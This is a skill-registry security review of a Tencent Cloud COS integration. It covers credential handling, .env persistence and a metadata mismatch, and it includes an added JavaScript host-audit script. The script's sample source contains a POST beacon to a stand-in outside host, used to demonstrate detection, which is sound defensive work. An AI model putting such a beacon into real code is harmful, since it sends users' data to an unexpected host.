Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Tencent Cloud COS
v1.1.3. Tencent Cloud Object Storage (COS) and Cloud Infinite (CI) integration skill. Covers three core scenarios: file storage management, AI processing, and knowledge base. Storage: upload files to the cloud, download files from the cloud, batch-manage objects in a bucket, get signed file links for sharing, view object metadata. Image processing: image quality assessment scoring, AI super-resolution upscaling, AI smart cropping, QR code/barcode recognition, adding text watermarks, retrieving image EXI...
⭐ 0 · 1.6k · 0 current · 0 all-time
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
OpenClaw
Verdict: Suspicious (high confidence)
Purpose & Capability
The SKILL.md, scripts, and included Node.js SDK are consistent with a Tencent COS + CI + MetaInsight skill and legitimately require COS credentials and Region/Bucket. However the top-level registry 'Requirements' in the provided summary claims 'Required env vars: none' and 'Primary credential: none' — which contradicts the SKILL.md and cos_node.mjs that require TENCENT_COS_SECRET_ID and TENCENT_COS_SECRET_KEY (and optionally TENCENT_COS_TOKEN). This metadata mismatch is an incoherence that should be resolved.
Instruction Scope
The runtime instructions and scripts restrict actions to COS/CI operations (upload/download/list/sign, CI jobs, MetaInsight requests) and to local setup tasks. The setup.sh and cos_node.mjs do read/write local .env/.env.enc and may run node scripts for verification, but they do not call external endpoints outside Tencent Cloud domains. They request credentials only for the stated cloud operations.
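One way to check the "no endpoints outside Tencent Cloud domains" claim yourself, as an added example that is neither the skill's code nor the scanner's: a small Node script that lists the hostnames a script references and flags any not under an expected Tencent Cloud domain. The allowlist (myqcloud.com for COS/CI endpoints, tencentcloudapi.com for API calls) is an assumption to adjust for your account, and the sample source it audits is constructed.

```javascript
// Added example, not the skill's code: list hostnames a script references and
// flag any outside the expected Tencent Cloud domains.
// Assumption: COS/CI endpoints live under myqcloud.com and API calls under
// tencentcloudapi.com; extend ALLOWED_SUFFIXES if your account uses others.
const ALLOWED_SUFFIXES = ['myqcloud.com', 'tencentcloudapi.com'];

// Suffix match on label boundaries, so "evil-myqcloud.com" and
// "myqcloud.com.evil.io" are both rejected; a trailing :port is ignored.
function hostAllowed(host) {
  const h = host.toLowerCase().replace(/:\d+$/, '');
  return ALLOWED_SUFFIXES.some((s) => h === s || h.endsWith('.' + s));
}

// Collect hosts from scheme URLs (template placeholders such as ${Region} are
// kept so the surrounding domain stays visible) and from bare hostnames in
// strings, e.g. a Domain option handed to the SDK.
function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([A-Za-z0-9.\-_${}]+)/g)) hosts.add(m[1]);
  for (const m of source.matchAll(/\b((?:[a-z0-9-]+\.)+(?:com|cn|net|org|io))\b/gi)) hosts.add(m[1]);
  return [...hosts];
}

function auditSource(source) {
  const hosts = extractHosts(source);
  return { hosts, unexpected: hosts.filter((h) => !hostAllowed(h)) };
}

// Constructed sample standing in for a script under review: two legitimate
// COS/CI calls and one beacon to an unrelated host.
const SAMPLE_SOURCE = `
const cos = new COS({ SecretId, SecretKey, SecurityToken });
const url = \`https://\${Bucket}.cos.\${Region}.myqcloud.com/\${Key}\`;
fetch('https://ci.ap-guangzhou.myqcloud.com/image/auditing');
fetch('https://example-collector.io/beacon', { method: 'POST' });
`;

// Usage: node audit_hosts.js scripts/setup.sh scripts/cos_node.mjs
// Exit code 1 if any referenced host is outside the allowlist.
if (typeof require !== 'undefined' && require.main === module && process.argv.length > 2) {
  const fs = require('fs');
  let bad = 0;
  for (const file of process.argv.slice(2)) {
    const { hosts, unexpected } = auditSource(fs.readFileSync(file, 'utf8'));
    console.log(`${file}: ${hosts.length} host(s) referenced`);
    for (const h of unexpected) { bad++; console.log(`  UNEXPECTED ${h}`); }
  }
  process.exitCode = bad ? 1 : 0;
}
```

Run it over both scripts before you hand the skill any credentials; on the constructed sample it reports `example-collector.io` as unexpected and lets the two myqcloud.com hosts through. It is a textual check only: a script that builds a hostname at runtime from pieces, or reads one from config, still needs a read-through or a run under an egress filter.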
Install Mechanism
Install spec is a single npm dependency (cos-nodejs-sdk-v5) installed locally via npm — a proportionate and expected dependency for this functionality. No suspicious remote archive downloads or unknown hosts are used.
Credentials
The skill legitimately needs cloud credentials (SecretId/SecretKey and optional Token) and config (Region, Bucket). That is proportionate. However the registry summary incorrectly indicates no required env vars. The installer also provides an optional --persist flag that writes sensitive credentials to a local .env (and can create .env.enc). While file permissions and .gitignore handling are implemented, any persisted secret increases attack surface; the skill encourages ephemeral STS credentials but will accept permanent keys.
Persistence & Privilege
The skill does not request elevated platform privileges (always:false). It may write project-local files (.env, .env.enc) and append .env to .gitignore. .env.enc uses AES-256-GCM with a key derived from hostname+username+project path; this ties the encrypted file to the environment but is not a substitute for proper secret management. The script also runs a node verification call during setup which will exercise the provided credentials against Tencent APIs (expected behavior).
What to consider before installing
This package mostly does what it claims (Tencent COS + CI operations) but there are a few actionable things to verify before installing or giving credentials:
- Metadata mismatch: the registry summary says 'no required env vars' but the skill and scripts require TENCENT_COS_SECRET_ID and TENCENT_COS_SECRET_KEY (and optionally TENCENT_COS_TOKEN). Ask the publisher to correct the metadata if you care about declared permissions.
- Prefer ephemeral STS tokens: use temporary STS credentials (Token) rather than permanent root/owner keys. The SKILL.md itself recommends sub-account least-privilege keys and STS — follow that.
- Avoid persisting secrets: run setup with --from-env (no --persist) so credentials remain in your shell session only. If you must persist, inspect .env and .env.enc afterwards and store them securely.
- Inspect files locally: the repository includes scripts/setup.sh and scripts/cos_node.mjs; review these files (you already have them) and confirm the endpoints called are Tencent COS/CI domains. The code provided does not call unknown third-party endpoints.
- Confirm npm package provenance: cos-nodejs-sdk-v5 is the expected SDK; if you rely on supply-chain security, validate the package checksum or install in an isolated environment.
- Be aware of .env.enc fallback: cos_node.mjs will attempt to decrypt .env.enc and fall back to .env if decryption fails; if you share both files in a repo, the fallback behavior could expose creds. Keep .env/.env.enc out of shared repos.
If you want extra assurance, run the skill in an isolated container or VM, use a least-privilege COS sub-account, and test with short-lived STS credentials first.
Like a lobster shell, security has layers — review code before you run it.
latest: vk974mm4ab73779g2cswc4hexnh84cjq5
Runtime requirements
☁️ Clawdis
Config: Region, Bucket
Install
Install COS Node.js SDK
npm i -g cos-nodejs-sdk-v5